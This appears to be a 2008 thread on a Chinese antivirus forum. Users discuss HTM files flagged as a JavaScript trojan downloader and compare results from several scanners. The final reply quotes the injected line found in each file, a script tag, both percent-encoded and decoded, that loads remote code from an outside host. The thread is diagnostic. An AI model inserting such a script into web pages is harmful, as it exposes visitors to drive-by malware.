查看: 3009|回复: 11
收起左侧

[病毒样本] 木马?

[复制链接]
spatra
发表于 2008-1-23 19:55:58 | 显示全部楼层 |阅读模式
今天用了下江民的在线扫描,发现N个HTM文件报告是病毒 Trojan Downloader.JS.Agent.dg
但用小红伞和卡巴斯基的在线扫描都没发现病毒,因为今天用360查出过未知系统镜像劫持,所有不敢忽视。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
qigang
发表于 2008-1-23 19:57:17 | 显示全部楼层
没有问题!安全!
su-tt
发表于 2008-1-23 19:59:02 | 显示全部楼层
小红伞没反应,里面貌似都是HTML文件
spatra
 楼主| 发表于 2008-1-23 20:03:41 | 显示全部楼层
我同学用卡巴斯基扫描出来是病毒,怎么卡巴斯基的在线扫描不报病毒.....

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
28654621
头像被屏蔽
发表于 2008-1-23 20:08:28 | 显示全部楼层
MD5: 8c11136754a438fd86dc5c05c42ee763
级别评分: 0.0
动作: 在线扫描

状态: 它是一个“病毒”
sharkkong
头像被屏蔽
发表于 2008-1-23 20:11:29 | 显示全部楼层
ACCESS DENIED
The requested URL could not be retrieved

--------------------------------------------------------------------------------

While trying to retrieve the URL: http://bbs.kafan.cn/attachment.php?aid=188735

The folowing error was encountered:

The requested object is INFECTED. The following viruses Virus.Win32.Xorer.du were found

Please contact your service provider if you feel this is incorrect.



--------------------------------------------------------------------------------

Generated Wed Jan 23 20:10:36 2008 by Kaspersky Anti-Virus 7.0
spatra
 楼主| 发表于 2008-1-23 20:13:52 | 显示全部楼层
我选择了其中9个文件上存到VIRSCAN扫描,结果发现没病毒:
http://virscan.org/report/4d4f8b1bc57394a3c66aac93bb97ebe4.html
wangjay1980
发表于 2008-1-23 20:23:54 | 显示全部楼层
被感染的,可以清毒
will
发表于 2008-1-24 00:40:30 | 显示全部楼层

回复 1楼 spatra 的帖子

肯定是感染了恶意代码   已经被清除了~
tanlimo
发表于 2008-1-24 00:55:41 | 显示全部楼层
每个文件都加了一段
<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70"></script>

<script src="http://js.k0102.com/01.asp"></script>
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-25 15:27 , Processed in 0.140437 second(s), 23 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表